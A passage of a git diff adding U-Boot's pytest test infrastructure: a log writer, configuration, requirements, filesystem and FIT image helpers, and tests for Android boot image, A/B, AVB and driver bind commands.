msg: A message describing the xpassed test(s). + anchor: Optional internal link target. + + Returns: + Nothing. + """ + + self._note("status-xpass", msg, anchor) + + def status_fail(self, msg, anchor=None): + """Write a note to the log file describing failed test(s). + + Args: + msg: A message describing the failed test(s). + anchor: Optional internal link target. + + Returns: + Nothing. + """ + + self._note("status-fail", msg, anchor) + + def get_stream(self, name, chained_file=None): + """Create an object to log a single stream's data into the log file. + + This creates a "file-like" object that can be written to in order to + write a single stream's data to the log file. The implementation will + handle any required interleaving of data (from multiple streams) in + the log, in a way that makes it obvious which stream each bit of data + came from. + + Args: + name: The name of the stream. + chained_file: The file-like object to which all stream data should + be logged to in addition to this log. Can be None. + + Returns: + A file-like object. + """ + + return LogfileStream(self, name, chained_file) + + def get_runner(self, name, chained_file=None): + """Create an object that executes processes and logs their output. + + Args: + name: The name of this sub-process. + chained_file: The file-like object to which all stream data should + be logged to in addition to logfile. Can be None. + + Returns: + A RunAndLog object. + """ + + return RunAndLog(self, name, chained_file) + + def write(self, stream, data, implicit=False): + """Write stream data into the log file. + + This function should only be used by instances of LogfileStream or + RunAndLog. + + Args: + stream: The stream whose data is being logged. + data: The data to log. + implicit: Boolean indicating whether data actually appeared in the + stream, or was implicitly generated. A valid use-case is to + repeat a shell prompt at the start of each separate log + section, which makes the log sections more readable in + isolation. + + Returns: + Nothing. + """ + + if stream != self.last_stream: + self._terminate_stream() + self.f.write('<div class="stream block">\n') + self.f.write('<div class="stream-header block-header">Stream: ' + + stream.name + '</div>\n') + self.f.write('<div class="stream-content block-content">\n') + self.f.write('<pre>') + if implicit: + self.f.write('<span class="implicit">') + self.f.write(self._escape(data)) + if implicit: + self.f.write('</span>') + self.last_stream = stream + + def flush(self): + """Flush the log stream, to ensure correct log interleaving. + + Args: + None. + + Returns: + Nothing. + """ + + self.f.flush() diff --git a/test/py/pytest.ini b/test/py/pytest.ini new file mode 100644 index 00000000000..26d83f83e00 --- /dev/null +++ b/test/py/pytest.ini @@ -0,0 +1,14 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2015 Stephen Warren +# Copyright (c) 2015-2016, NVIDIA CORPORATION. All rights reserved. + +# Static configuration data for pytest. pytest reads this at startup time. + +[pytest] +markers = + boardspec: U-Boot: Describes the set of boards a test can/can't run on. + buildconfigspec: U-Boot: Describes Kconfig/config-header constraints. + notbuildconfigspec: U-Boot: Describes required disabled Kconfig options. + requiredtool: U-Boot: Required host tools for a test. + slow: U-Boot: Specific test will run slowly. + singlethread: Cannot run in parallel diff --git a/test/py/requirements.txt b/test/py/requirements.txt new file mode 100644 index 00000000000..0f67c3c6194 --- /dev/null +++ b/test/py/requirements.txt @@ -0,0 +1,30 @@ +atomicwrites==1.4.1 +attrs==19.3.0 +concurrencytest==0.1.2 +coverage==4.5.4 +extras==1.0.0 +filelock==3.0.12 +fixtures==3.0.0 +importlib-metadata==0.23 +linecache2==1.0.0 +more-itertools==7.2.0 +packaging==23.2 +pbr==5.4.3 +pluggy==0.13.0 +py==1.11.0 +pycryptodomex==3.19.1 +pyelftools==0.27 +pygit2==1.13.3 +pyparsing==3.0.7 +pytest==6.2.5 +pytest-xdist==2.5.0 +python-mimeparse==1.6.0 +python-subunit==1.3.0 +requests==2.31.0 +setuptools==65.5.1 +six==1.16.0 +testtools==2.3.0 +traceback2==1.4.0 +unittest2==1.1.0 +wcwidth==0.1.7 +zipp==0.6.0 diff --git a/test/py/test.py b/test/py/test.py new file mode 100755 index 00000000000..95859a66e29 --- /dev/null +++ b/test/py/test.py @@ -0,0 +1,25 @@ +#!/usr/bin/env python3 +# SPDX-License-Identifier: GPL-2.0 + +# Copyright (c) 2015 Stephen Warren +# Copyright (c) 2015-2016, NVIDIA CORPORATION. All rights reserved. + +# Wrapper script to invoke pytest with the directory name that contains the +# U-Boot tests. + +import os +import os.path +import sys +import pytest +from pkg_resources import load_entry_point + +if __name__ == '__main__': + # argv; py.test test_directory_name user-supplied-arguments + args = [os.path.dirname(__file__) + '/tests'] + args.extend(sys.argv) + + # Use short format by default + if not [arg for arg in args if '--tb=' in arg]: + args.append('--tb=short') + + sys.exit(pytest.main(args)) diff --git a/test/py/tests/bootstd/armbian.bmp.xz b/test/py/tests/bootstd/armbian.bmp.xz Binary files differnew file mode 100644 index 00000000000..ad137ea6e6d --- /dev/null +++ b/test/py/tests/bootstd/armbian.bmp.xz diff --git a/test/py/tests/bootstd/mmc1.img.xz b/test/py/tests/bootstd/mmc1.img.xz Binary files differnew file mode 100644 index 00000000000..cebf7b9c53b --- /dev/null +++ b/test/py/tests/bootstd/mmc1.img.xz diff --git a/test/py/tests/bootstd/mmc4.img.xz b/test/py/tests/bootstd/mmc4.img.xz Binary files differnew file mode 100644 index 00000000000..f4db011969f --- /dev/null +++ b/test/py/tests/bootstd/mmc4.img.xz diff --git a/test/py/tests/fit_util.py b/test/py/tests/fit_util.py new file mode 100644 index 00000000000..79718d431a0 --- /dev/null +++ b/test/py/tests/fit_util.py @@ -0,0 +1,93 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright 2022 Google LLC + +"""Common utility functions for FIT tests""" + +import os + +import u_boot_utils as util + +def make_fname(cons, basename): + """Make a temporary filename + + Args: + cons (ConsoleBase): u_boot_console to use + basename (str): Base name of file to create (within temporary directory) + Return: + Temporary filename + """ + + return os.path.join(cons.config.build_dir, basename) + +def make_its(cons, base_its, params, basename='test.its'): + """Make a sample .its file with parameters embedded + + Args: + cons (ConsoleBase): u_boot_console to use + base_its (str): Template text for the .its file, typically containing + %() references + params (dict of str): Parameters to embed in the %() strings + basename (str): base name to write to (will be placed in the temp dir) + Returns: + str: Filename of .its file created + """ + its = make_fname(cons, basename) + with open(its, 'w', encoding='utf-8') as outf: + print(base_its % params, file=outf) + return its + +def make_fit(cons, mkimage, base_its, params, basename='test.fit', base_fdt=None): + """Make a sample .fit file ready for loading + + This creates a .its script with the selected parameters and uses mkimage to + turn this into a .fit image. + + Args: + cons (ConsoleBase): u_boot_console to use + mkimage (str): Filename of 'mkimage' utility + base_its (str): Template text for the .its file, typically containing + %() references + params (dict of str): Parameters to embed in the %() strings + basename (str): base name to write to (will be placed in the temp dir) + Return: + Filename of .fit file created + """ + fit = make_fname(cons, basename) + its = make_its(cons, base_its, params) + util.run_and_log(cons, [mkimage, '-f', its, fit]) + if base_fdt: + with open(make_fname(cons, 'u-boot.dts'), 'w') as fd: + fd.write(base_fdt) + return fit + +def make_kernel(cons, basename, text): + """Make a sample kernel with test data + + Args: + cons (ConsoleBase): u_boot_console to use + basename (str): base name to write to (will be placed in the temp dir) + text (str): Contents of the kernel file (will be repeated 100 times) + Returns: + str: Full path and filename of the kernel it created + """ + fname = make_fname(cons, basename) + data = '' + for i in range(100): + data += f'this {text} {i} is unlikely to boot\n' + with open(fname, 'w', encoding='utf-8') as outf: + print(data, file=outf) + return fname + +def make_dtb(cons, base_fdt, basename): + """Make a sample .dts file and compile it to a .dtb + + Returns: + cons (ConsoleBase): u_boot_console to use + Filename of .dtb file created + """ + src = make_fname(cons, f'{basename}.dts') + dtb = make_fname(cons, f'{basename}.dtb') + with open(src, 'w', encoding='utf-8') as outf: + outf.write(base_fdt) + util.run_and_log(cons, ['dtc', src, '-O', 'dtb', '-o', dtb]) + return dtb diff --git a/test/py/tests/fs_helper.py b/test/py/tests/fs_helper.py new file mode 100644 index 00000000000..380f4c4dca3 --- /dev/null +++ b/test/py/tests/fs_helper.py @@ -0,0 +1,69 @@ +# SPDX-License-Identifier: GPL-2.0+ +# +# Copyright (c) 2018, Linaro Limited +# Author: Takahiro Akashi <takahiro.akashi@linaro.org> + +"""Helper functions for dealing with filesystems""" + +import re +import os +from subprocess import call, check_call, check_output, CalledProcessError + +def mk_fs(config, fs_type, size, prefix, size_gran = 0x100000): + """Create a file system volume + + Args: + config (u_boot_config): U-Boot configuration + fs_type (str): File system type, e.g. 'ext4' + size (int): Size of file system in bytes + prefix (str): Prefix string of volume's file name + size_gran (int): Size granularity of file system image in bytes + + Raises: + CalledProcessError: if any error occurs when creating the filesystem + """ + fs_img = f'{prefix}.{fs_type}.img' + fs_img = os.path.join(config.persistent_data_dir, fs_img) + + if fs_type == 'fat12': + mkfs_opt = '-F 12' + elif fs_type == 'fat16': + mkfs_opt = '-F 16' + elif fs_type == 'fat32': + mkfs_opt = '-F 32' + else: + mkfs_opt = '' + + if re.match('fat', fs_type): + fs_lnxtype = 'vfat' + else: + fs_lnxtype = fs_type + + count = (size + size_gran - 1) // size_gran + + # Some distributions do not add /sbin to the default PATH, where mkfs lives + if '/sbin' not in os.environ["PATH"].split(os.pathsep): + os.environ["PATH"] += os.pathsep + '/sbin' + + try: + check_call(f'rm -f {fs_img}', shell=True) + check_call(f'dd if=/dev/zero of={fs_img} bs={size_gran} count={count}', + shell=True) + check_call(f'mkfs.{fs_lnxtype} {mkfs_opt} {fs_img}', shell=True) + if fs_type == 'ext4': + sb_content = check_output(f'tune2fs -l {fs_img}', + shell=True).decode() + if 'metadata_csum' in sb_content: + check_call(f'tune2fs -O ^metadata_csum {fs_img}', shell=True) + return fs_img + except CalledProcessError: + call(f'rm -f {fs_img}', shell=True) + raise + +# Just for trying out +if __name__ == "__main__": + import collections + + CNF= collections.namedtuple('config', 'persistent_data_dir') + + mk_fs(CNF('.'), 'ext4', 0x1000000, 'pref') diff --git a/test/py/tests/source.its b/test/py/tests/source.its new file mode 100644 index 00000000000..3c62f777f17 --- /dev/null +++ b/test/py/tests/source.its @@ -0,0 +1,43 @@ +/dts-v1/; + +/ { + description = "FIT image to test the source command"; + #address-cells = <1>; + + images { + default = "script-1"; + + script-1 { + data = "echo 1"; + type = "script"; + arch = "sandbox"; + compression = "none"; + }; + + script-2 { + data = "echo 2"; + type = "script"; + arch = "sandbox"; + compression = "none"; + }; + + not-a-script { + data = "echo 3"; + type = "kernel"; + arch = "sandbox"; + compression = "none"; + }; + }; + + configurations { + default = "conf-2"; + + conf-1 { + script = "script-1"; + }; + + conf-2 { + script = "script-2"; + }; + }; +}; diff --git a/test/py/tests/test_000_version.py b/test/py/tests/test_000_version.py new file mode 100644 index 00000000000..bd089ab5439 --- /dev/null +++ b/test/py/tests/test_000_version.py @@ -0,0 +1,19 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2015 Stephen Warren +# Copyright (c) 2016, NVIDIA CORPORATION. All rights reserved. + +# pytest runs tests the order of their module path, which is related to the +# filename containing the test. This file is named such that it is sorted +# first, simply as a very basic sanity check of the functionality of the U-Boot +# command prompt. + +def test_version(u_boot_console): + """Test that the "version" command prints the U-Boot version.""" + + # "version" prints the U-Boot sign-on message. This is usually considered + # an error, so that any unexpected reboot causes an error. Here, this + # error detection is disabled since the sign-on message is expected. + with u_boot_console.disable_check('main_signon'): + response = u_boot_console.run_command('version') + # Ensure "version" printed what we expected. + u_boot_console.validate_version_string_in_text(response) diff --git a/test/py/tests/test_android/test_ab.py b/test/py/tests/test_android/test_ab.py new file mode 100644 index 00000000000..c79cb07fda3 --- /dev/null +++ b/test/py/tests/test_android/test_ab.py @@ -0,0 +1,75 @@ +# SPDX-License-Identifier: GPL-2.0 +# (C) Copyright 2018 Texas Instruments, <www.ti.com> + +# Test A/B update commands. + +import os +import pytest +import u_boot_utils + +class ABTestDiskImage(object): + """Disk Image used by the A/B tests.""" + + def __init__(self, u_boot_console): + """Initialize a new ABTestDiskImage object. + + Args: + u_boot_console: A U-Boot console. + + Returns: + Nothing. + """ + + filename = 'test_ab_disk_image.bin' + + persistent = u_boot_console.config.persistent_data_dir + '/' + filename + self.path = u_boot_console.config.result_dir + '/' + filename + + with u_boot_utils.persistent_file_helper(u_boot_console.log, persistent): + if os.path.exists(persistent): + u_boot_console.log.action('Disk image file ' + persistent + + ' already exists') + else: + u_boot_console.log.action('Generating ' + persistent) + fd = os.open(persistent, os.O_RDWR | os.O_CREAT) + os.ftruncate(fd, 524288) + os.close(fd) + cmd = ('sgdisk', persistent) + u_boot_utils.run_and_log(u_boot_console, cmd) + + cmd = ('sgdisk', '--new=1:64:512', '--change-name=1:misc', + persistent) + u_boot_utils.run_and_log(u_boot_console, cmd) + cmd = ('sgdisk', '--load-backup=' + persistent) + u_boot_utils.run_and_log(u_boot_console, cmd) + + cmd = ('cp', persistent, self.path) + u_boot_utils.run_and_log(u_boot_console, cmd) + +di = None +@pytest.fixture(scope='function') +def ab_disk_image(u_boot_console): + global di + if not di: + di = ABTestDiskImage(u_boot_console) + return di + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('android_ab') +@pytest.mark.buildconfigspec('cmd_ab_select') +@pytest.mark.requiredtool('sgdisk') +def test_ab(ab_disk_image, u_boot_console): + """Test the 'ab_select' command.""" + + u_boot_console.run_command('host bind 0 ' + ab_disk_image.path) + + output = u_boot_console.run_command('ab_select slot_name host 0#misc') + assert 're-initializing A/B metadata' in output + assert 'Attempting slot a, tries remaining 7' in output + output = u_boot_console.run_command('printenv slot_name') + assert 'slot_name=a' in output + + output = u_boot_console.run_command('ab_select slot_name host 0:1') + assert 'Attempting slot b, tries remaining 7' in output + output = u_boot_console.run_command('printenv slot_name') + assert 'slot_name=b' in output diff --git a/test/py/tests/test_android/test_abootimg.py b/test/py/tests/test_android/test_abootimg.py new file mode 100644 index 00000000000..6a8ff34538b --- /dev/null +++ b/test/py/tests/test_android/test_abootimg.py @@ -0,0 +1,269 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2020 +# Author: Sam Protsenko <joe.skb7@gmail.com> + +# Test U-Boot's "abootimg" commands. + +import os +import pytest +import u_boot_utils + +""" +These tests rely on disk image (boot.img), which is automatically created by +the test from the stored hex dump. This is done to avoid the dependency on the +most recent mkbootimg tool from AOSP/master. Here is the list of commands which +was used to generate the boot.img and obtain compressed hex dump from it: + + $ echo '/dts-v1/; / { model = "x1"; compatible = "y1,z1"; };' > test1.dts + $ echo '/dts-v1/; / { model = "x2"; compatible = "y2,z2"; };' > test2.dts + $ dtc test1.dts > dt1.dtb + $ dtc test2.dts > dt2.dtb + $ cat dt1.dtb dt2.dtb > dtb.img + $ echo 'kernel payload' > kernel + $ echo 'ramdisk payload' > ramdisk.img + $ mkbootimg --kernel ./kernel --ramdisk ./ramdisk.img \ + --cmdline "cmdline test" --dtb ./dtb.img \ + --os_version R --os_patch_level 2019-06-05 \ + --header_version 2 --output boot.img + $ gzip -9 boot.img + $ xxd -p boot.img.gz > boot.img.gz.hex + +Now one can obtain original boot.img from this hex dump like this: + + $ xxd -r -p boot.img.gz.hex boot.img.gz + $ gunzip -9 boot.img.gz + +For boot image header version 4, these tests rely on two images that are generated +using the same steps above : + +1- boot.img : + $ mkbootimg --kernel ./kernel --ramdisk ./ramdisk.img \ + --cmdline "cmdline test" --dtb ./dtb.img \ + --os_version R --os_patch_level 2019-06-05 \ + --header_version 4 --output ./boot.img + +2- vendor_boot.img + $ mkbootimg --kernel ./kernel --ramdisk ./ramdisk.img \ + --cmdline "cmdline test" --dtb ./dtb.img \ + --os_version R --os_patch_level 2019-06-05 \ + --pagesize 4096 --vendor_ramdisk ./ramdisk.img \ + --header_version 4 --vendor_boot ./vboot.img \ + +""" + +# boot.img.gz hex dump +img_hex = """1f8b08084844af5d0203626f6f742e696d670073f47309f2f77451e46700 +820606010106301084501f04181819041838181898803c3346060c909c9b +92939997aa50925a5cc2300a461c3078b2e1793c4b876fd92db97939fb6c +b7762ffff07d345446c1281805e8a0868d81e117a45e111c0d8dc101b253 +8bf25273140a122b73f21353b8460364148c8251300a46c1281801a02831 +3725b3387bb401300a46c1281805a360148c207081f7df5b20550bc41640 +9c03c41a0c90f17fe85400986d82452b6c3680198a192a0ce17c3610ae34 +d4a9820881a70f3873f35352731892f3730b124b32937252a96bb9119ae5 +463a5546f82c1f05a360148c8251300a462e000085bf67f200200000""" + +# boot img v4 hex dump +boot_img_hex = """1f8b080827b0cd630203626f6f742e696d6700edd8bd0d82601885d1d7c4 +58d8c808b88195bd098d8d246e40e42b083f1aa0717be99d003d277916b8 +e5bddc8a7b792d8e8788c896ce9b88d32ebe6c971e7ddd3543cae734cd01 +c0ffc84c0000b0766d1a87d4e5afeadd3dab7a6f10000000f84163d5d7cd +d43a000000000000000060c53e7544995700400000""" + +# vendor boot image v4 hex dump +vboot_img_hex = """1f8b0808baaecd63020376626f6f742e696d6700edd8310b824018c6f1b3 +222a08f41b3436b4280dcdd19c11d16ee9109d18d59042d047ec8b04cd0d +d19d5a4345534bf6ffc173ef29272f38e93b1d0ec67dd79d548462aa1cd2 +d5d20b0000f8438678f90c18d584b8a4bbb3a557991ecb2a0000f80d6b2f +f4179b656be5c532f2fc066f040000000080e23936af2755f62a3d918df1 +db2a7ab67f9ffdeb7df7cda3465ecb79c4ce7e5c577562bb9364b74449a5 +1e467e20c53c0a57de763193c1779b3b4fcd9d4ee27c6a0e00000000c0ff +309ffea7010000000040f1dc004129855400400000""" + +# Expected response for "abootimg dtb_dump" command +dtb_dump_resp="""## DTB area contents (concat format): + - DTB #0: + (DTB)size = 125 + (DTB)model = x1 + (DTB)compatible = y1,z1 + - DTB #1: + (DTB)size = 125 + (DTB)model = x2 + (DTB)compatible = y2,z2""" +# Address in RAM where to load the boot image ('abootimg' looks in $loadaddr) +loadaddr = 0x1000 +# Address in RAM where to load the vendor boot image ('abootimg' looks in $vloadaddr) +vloadaddr= 0x10000 +# Expected DTB #1 offset from the boot image start address +dtb1_offset = 0x187d +# Expected DTB offset from the vendor boot image start address +dtb2_offset = 0x207d +# DTB #1 start address in RAM +dtb1_addr = loadaddr + dtb1_offset +# DTB #2 start address in RAM +dtb2_addr = vloadaddr + dtb2_offset + +class AbootimgTestDiskImage(object): + """Disk image used by abootimg tests.""" + + def __init__(self, u_boot_console, image_name, hex_img): + """Initialize a new AbootimgDiskImage object. + + Args: + u_boot_console: A U-Boot console. + + Returns: + Nothing. + """ + + gz_hex = u_boot_console.config.persistent_data_dir + '/' + image_name + '.gz.hex' + gz = u_boot_console.config.persistent_data_dir + '/' + image_name + '.gz' + + filename = image_name + persistent = u_boot_console.config.persistent_data_dir + '/' + filename + self.path = u_boot_console.config.result_dir + '/' + filename + u_boot_console.log.action('persistent is ' + persistent) + with u_boot_utils.persistent_file_helper(u_boot_console.log, persistent): + if os.path.exists(persistent): + u_boot_console.log.action('Disk image file ' + persistent + + ' already exists') + else: + u_boot_console.log.action('Generating ' + persistent) + + f = open(gz_hex, "w") + f.write(hex_img) + f.close() + cmd = ('xxd', '-r', '-p', gz_hex, gz) + u_boot_utils.run_and_log(u_boot_console, cmd) + cmd = ('gunzip', '-9', gz) + u_boot_utils.run_and_log(u_boot_console, cmd) + + cmd = ('cp', persistent, self.path) + u_boot_utils.run_and_log(u_boot_console, cmd) + +gtdi1 = None +@pytest.fixture(scope='function') +def abootimg_disk_image(u_boot_console): + """pytest fixture to provide a AbootimgTestDiskImage object to tests. + This is function-scoped because it uses u_boot_console, which is also + function-scoped. However, we don't need to actually do any function-scope + work, so this simply returns the same object over and over each time.""" + + global gtdi1 + if not gtdi1: + gtdi1 = AbootimgTestDiskImage(u_boot_console, 'boot.img', img_hex) + return gtdi1 + +gtdi2 = None +@pytest.fixture(scope='function') +def abootimgv4_disk_image_vboot(u_boot_console): + """pytest fixture to provide a AbootimgTestDiskImage object to tests. + This is function-scoped because it uses u_boot_console, which is also + function-scoped. However, we don't need to actually do any function-scope + work, so this simply returns the same object over and over each time.""" + + global gtdi2 + if not gtdi2: + gtdi2 = AbootimgTestDiskImage(u_boot_console, 'vendor_boot.img', vboot_img_hex) + return gtdi2 + +gtdi3 = None +@pytest.fixture(scope='function') +def abootimgv4_disk_image_boot(u_boot_console): + """pytest fixture to provide a AbootimgTestDiskImage object to tests. + This is function-scoped because it uses u_boot_console, which is also + function-scoped. However, we don't need to actually do any function-scope + work, so this simply returns the same object over and over each time.""" + + global gtdi3 + if not gtdi3: + gtdi3 = AbootimgTestDiskImage(u_boot_console, 'bootv4.img', boot_img_hex) + return gtdi3 + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('android_boot_image') +@pytest.mark.buildconfigspec('cmd_abootimg') +@pytest.mark.buildconfigspec('cmd_fdt') +@pytest.mark.requiredtool('xxd') +@pytest.mark.requiredtool('gunzip') +def test_abootimg(abootimg_disk_image, u_boot_console): + """Test the 'abootimg' command.""" + + u_boot_console.log.action('Loading disk image to RAM...') + u_boot_console.run_command('setenv loadaddr 0x%x' % (loadaddr)) + u_boot_console.run_command('host load hostfs - 0x%x %s' % (loadaddr, + abootimg_disk_image.path)) + + u_boot_console.log.action('Testing \'abootimg get ver\'...') + response = u_boot_console.run_command('abootimg get ver') + assert response == "2" + u_boot_console.run_command('abootimg get ver v') + response = u_boot_console.run_command('env print v') + assert response == 'v=2' + + u_boot_console.log.action('Testing \'abootimg get recovery_dtbo\'...') + response = u_boot_console.run_command('abootimg get recovery_dtbo a') + assert response == 'Error: recovery_dtbo_size is 0' + + u_boot_console.log.action('Testing \'abootimg dump dtb\'...') + response = u_boot_console.run_command('abootimg dump dtb').replace('\r', '') + assert response == dtb_dump_resp + + u_boot_console.log.action('Testing \'abootimg get dtb_load_addr\'...') + u_boot_console.run_command('abootimg get dtb_load_addr a') + response = u_boot_console.run_command('env print a') + assert response == 'a=11f00000' + + u_boot_console.log.action('Testing \'abootimg get dtb --index\'...') + u_boot_console.run_command('abootimg get dtb --index=1 dtb1_start') + response = u_boot_console.run_command('env print dtb1_start') + correct_str = "dtb1_start=%x" % (dtb1_addr) + assert response == correct_str + u_boot_console.run_command('fdt addr $dtb1_start') + u_boot_console.run_command('fdt get value v / model') + response = u_boot_console.run_command('env print v') + assert response == 'v=x2' + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('android_boot_image') +@pytest.mark.buildconfigspec('cmd_abootimg') +@pytest.mark.buildconfigspec('cmd_fdt') +@pytest.mark.requiredtool('xxd') +@pytest.mark.requiredtool('gunzip') +def test_abootimgv4(abootimgv4_disk_image_vboot, abootimgv4_disk_image_boot, u_boot_console): + """Test the 'abootimg' command with boot image header v4.""" + + cons = u_boot_console + cons.log.action('Loading disk image to RAM...') + cons.run_command('setenv loadaddr 0x%x' % (loadaddr)) + cons.run_command('setenv vloadaddr 0x%x' % (vloadaddr)) + cons.run_command('host load hostfs - 0x%x %s' % (vloadaddr, + abootimgv4_disk_image_vboot.path)) + cons.run_command('host load hostfs - 0x%x %s' % (loadaddr, + abootimgv4_disk_image_boot.path)) + cons.run_command('abootimg addr 0x%x 0x%x' % (loadaddr, vloadaddr)) + cons.log.action('Testing \'abootimg get ver\'...') + response = cons.run_command('abootimg get ver') + assert response == "4" + cons.run_command('abootimg get ver v') + response = cons.run_command('env print v') + assert response == 'v=4' + + cons.log.action('Testing \'abootimg get recovery_dtbo\'...') + response = cons.run_command('abootimg get recovery_dtbo a') + assert response == 'Error: header version must be >= 1 and <= 2 to get dtbo' + + cons.log.action('Testing \'abootimg get dtb_load_addr\'...') + cons.run_command('abootimg get dtb_load_addr a') + response = cons.run_command('env print a') + assert response == 'a=11f00000' + + cons.log.action('Testing \'abootimg get dtb --index\'...') + cons.run_command('abootimg get dtb --index=1 dtb2_start') + response = cons.run_command('env print dtb2_start') + correct_str = "dtb2_start=%x" % (dtb2_addr) + assert response == correct_str + + cons.run_command('fdt addr $dtb2_start') + cons.run_command('fdt get value v / model') + response = cons.run_command('env print v') + assert response == 'v=x2' diff --git a/test/py/tests/test_android/test_avb.py b/test/py/tests/test_android/test_avb.py new file mode 100644 index 00000000000..865efbca4de --- /dev/null +++ b/test/py/tests/test_android/test_avb.py @@ -0,0 +1,138 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2018, Linaro Limited +# +# Android Verified Boot 2.0 Test + +""" +This tests Android Verified Boot 2.0 support in U-Boot: + +For additional details about how to build proper vbmeta partition +check doc/android/avb2.rst + +For configuration verification: +- Corrupt boot partition and check for failure +- Corrupt vbmeta partition and check for failure +""" + +import pytest +import u_boot_utils as util + +# defauld mmc id +mmc_dev = 1 +temp_addr = 0x90000000 +temp_addr2 = 0x90002000 + +@pytest.mark.buildconfigspec('cmd_avb') +@pytest.mark.buildconfigspec('cmd_mmc') +def test_avb_verify(u_boot_console): + """Run AVB 2.0 boot verification chain with avb subset of commands + """ + + success_str = "Verification passed successfully" + + response = u_boot_console.run_command('avb init %s' %str(mmc_dev)) + assert response == '' + response = u_boot_console.run_command('avb verify') + assert response.find(success_str) + + +@pytest.mark.buildconfigspec('cmd_avb') +@pytest.mark.buildconfigspec('cmd_mmc') +@pytest.mark.notbuildconfigspec('sandbox') +def test_avb_mmc_uuid(u_boot_console): + """Check if 'avb get_uuid' works, compare results with + 'part list mmc 1' output + """ + + response = u_boot_console.run_command('avb init %s' % str(mmc_dev)) + assert response == '' + + response = u_boot_console.run_command('mmc rescan; mmc dev %s' % + str(mmc_dev)) + assert response.find('is current device') + + part_lines = u_boot_console.run_command('mmc part').splitlines() + part_list = {} + cur_partname = '' + + for line in part_lines: + if '"' in line: + start_pt = line.find('"') + end_pt = line.find('"', start_pt + 1) + cur_partname = line[start_pt + 1: end_pt] + + if 'guid:' in line: + guid_to_check = line.split('guid:\t') + part_list[cur_partname] = guid_to_check[1] + + # lets check all guids with avb get_guid + for part, guid in part_list.items(): + avb_guid_resp = u_boot_console.run_command('avb get_uuid %s' % part) + assert guid == avb_guid_resp.split('UUID: ')[1] + + +@pytest.mark.buildconfigspec('cmd_avb') +def test_avb_read_rb(u_boot_console): + """Test reading rollback indexes + """ + + response = u_boot_console.run_command('avb init %s' % str(mmc_dev)) + assert response == '' + + response = u_boot_console.run_command('avb read_rb 1') + assert response == 'Rollback index: 0' + + +@pytest.mark.buildconfigspec('cmd_avb') +def test_avb_is_unlocked(u_boot_console): + """Test if device is in the unlocked state + """ + + response = u_boot_console.run_command('avb init %s' % str(mmc_dev)) + assert response == '' + + response = u_boot_console.run_command('avb is_unlocked') + assert response == 'Unlocked = 1' + + +@pytest.mark.buildconfigspec('cmd_avb') +@pytest.mark.buildconfigspec('cmd_mmc') +@pytest.mark.notbuildconfigspec('sandbox') +def test_avb_mmc_read(u_boot_console): + """Test mmc read operation + """ + + response = u_boot_console.run_command('mmc rescan; mmc dev %s 0' % + str(mmc_dev)) + assert response.find('is current device') + + response = u_boot_console.run_command('mmc read 0x%x 0x100 0x1' % temp_addr) + assert response.find('read: OK') + + response = u_boot_console.run_command('avb init %s' % str(mmc_dev)) + assert response == '' + + response = u_boot_console.run_command('avb read_part xloader 0 100 0x%x' % + temp_addr2) + assert response.find('Read 512 bytes') + + # Now lets compare two buffers + response = u_boot_console.run_command('cmp 0x%x 0x%x 40' % + (temp_addr, temp_addr2)) + assert response.find('64 word') + + +@pytest.mark.buildconfigspec('cmd_avb') +@pytest.mark.buildconfigspec('optee_ta_avb') +def test_avb_persistent_values(u_boot_console): + """Test reading/writing persistent storage to avb + """ + + response = u_boot_console.run_command('avb init %s' % str(mmc_dev)) + assert response == '' + + response = u_boot_console.run_command('avb write_pvalue test value_value') + assert response == 'Wrote 12 bytes' + + response = u_boot_console.run_command('avb read_pvalue test 12') + assert response == 'Read 12 bytes, value = value_value' diff --git a/test/py/tests/test_bind.py b/test/py/tests/test_bind.py new file mode 100644 index 00000000000..1376ab5ed28 --- /dev/null +++ b/test/py/tests/test_bind.py @@ -0,0 +1,193 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2016, NVIDIA CORPORATION. All rights reserved. + +""" Test for bind command """ + +import re +import pytest + +def in_tree(response, name, uclass, drv, depth, last_child): + lines = [x.strip() for x in response.splitlines()] + leaf = '' + if depth != 0: + leaf = ' ' + ' ' * (depth - 1) + if not last_child: + leaf = leaf + r'\|' + else: + leaf = leaf + '`' + + leaf = leaf + '-- ' + name + line = (r' *{:10.10} *[0-9]* \[ [ +] \] {:20.20} [` |]{}$' + .format(uclass, drv, leaf)) + prog = re.compile(line) + for l in lines: + if prog.match(l): + return True + return False + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_bind') +def test_bind_unbind_with_node(u_boot_console): + + tree = u_boot_console.run_command('dm tree') + assert in_tree(tree, 'bind-test', 'simple_bus', 'simple_bus', 0, True) + assert in_tree(tree, 'bind-test-child1', 'phy', 'phy_sandbox', 1, False) + assert in_tree(tree, 'bind-test-child2', 'simple_bus', 'simple_bus', 1, True) + + #bind usb_ether driver (which has no compatible) to usb@1 node. + ##New entry usb_ether should appear in the dm tree + response = u_boot_console.run_command('bind /usb@1 usb_ether') + assert response == '' + tree = u_boot_console.run_command('dm tree') + assert in_tree(tree, 'usb@1', 'ethernet', 'usb_ether', 1, True) + + #Unbind child #1. No error expected and all devices should be there except for bind-test-child1 + response = u_boot_console.run_command('unbind /bind-test/bind-test-child1') + assert response == '' + tree = u_boot_console.run_command('dm tree') + assert in_tree(tree, 'bind-test', 'simple_bus', 'simple_bus', 0, True) + assert 'bind-test-child1' not in tree + assert in_tree(tree, 'bind-test-child2', 'simple_bus', 'simple_bus', 1, True) + + #bind child #1. No error expected and all devices should be there + response = u_boot_console.run_command('bind /bind-test/bind-test-child1 phy_sandbox') + assert response == '' + tree = u_boot_console.run_command('dm tree') + assert in_tree(tree, 'bind-test', 'simple_bus', 'simple_bus', 0, True) + assert in_tree(tree, 'bind-test-child1', 'phy', 'phy_sandbox', 1, True) + assert in_tree(tree, 'bind-test-child2', 'simple_bus', 'simple_bus', 1, False) + + #Unbind child #2. No error expected and all devices should be there except for bind-test-child2 + response = u_boot_console.run_command('unbind /bind-test/bind-test-child2') + assert response == '' + tree = u_boot_console.run_command('dm tree') + assert in_tree(tree, 'bind-test', 'simple_bus', 